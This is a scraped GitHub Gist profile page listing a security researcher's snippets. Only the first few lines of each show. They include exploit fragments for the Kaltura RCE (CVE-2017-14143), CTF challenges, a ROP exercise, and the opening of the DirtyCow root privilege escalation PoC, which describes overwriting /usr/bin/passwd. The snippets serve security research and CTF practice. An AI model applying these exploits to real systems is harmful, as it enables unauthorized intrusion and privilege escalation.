Skip to content

Instantly share code, notes, and snippets.

Robin Verton rverton

Block or report user

Report or block rverton

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am rverton on github.
  • I am roob (https://keybase.io/roob) on keybase.
  • I have a public key ASB7AIRlWYr7z6mxQzopO21ynOCT3d1UjcsegZtkAcnNtwo

To claim this, I am signing this object:

@rverton
rverton / kaltura_unserialize_cookie_rce.py
Created Oct 24, 2017
Kaltura <= 13.1.0 Remote Code Execution (CVE-2017-14143)
View kaltura_unserialize_cookie_rce.py
@rverton
rverton / chrome_headless_screenshot.py
Created Jul 10, 2017
Make a screenshot with a headless google chrome in python
View chrome_headless_screenshot.py
# Install chromedriver from https://sites.google.com/a/chromium.org/chromedriver/downloads
import os
from optparse import OptionParser
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
CHROME_PATH = '/usr/bin/google-chrome'
@rverton
rverton / readflag.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View readflag.php
<?php
header('Access-Control-Allow-Origin: *');
$remote = $_SERVER['REMOTE_ADDR'];
if ($remote === '127.0.0.1' || $remote === '::1') {
$flag = fopen("/flag", "r") or die("Unable to open file!");
echo fread($flag,filesize("/flag"));
fclose($flag);
} else {
echo 'what do you expect to see here?';
@rverton
rverton / admin_console.php
Created Apr 9, 2017
ASIS CTF 2017, Tar Bomb Challenge
View admin_console.php
<?php
session_start();
if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
echo "Try better cookie, bro!";
die();
}
if (isset($_POST['url']) && isset($_POST['challenge'])) {
$url = $_POST['url'];
@rverton
rverton / level1-pwn.py
Created Mar 26, 2017
exploit for level1.bin (nullcon 2017)
View level1-pwn.py
#!/usr/bin/python
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
p.sendline('1')
p.recvuntil('Enter book name: ')
p.sendline('a')
@rverton
rverton / exploit.py
Created Nov 4, 2016
ROP Primer level2 - open, read and print flag file
View exploit.py
import struct
def p(value):
return struct.pack('<L', value);
writeable_buffer = 0x080ca004
open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700
@rverton
rverton / bytearray.py
Created Oct 25, 2016
Generate a bytearray for badchar detenction.
View bytearray.py
"""
This script generates a bytearray for badchar detection
and is similar to mona.py's bytearray function.
Usage:
Create bytearray.txt and bytearray.bin (0-255)
$ python bytearray.py
Create bytearray.txt and bytearray.bin and exclude chars
@rverton
rverton / cowroot.c
Created Oct 21, 2016
CVE-2016-5195 (DirtyCow) Local Root PoC
View cowroot.c
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@rverton
rverton / test_file_upload.py
Created Aug 2, 2016
Test file upload with flask (Python3)
View test_file_upload.py
from io import BytesIO
def test_file_upload(client):
data = {
'field': 'value',
'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
}
rv = client.post('/upload', buffered=True,
You can’t perform that action at this time.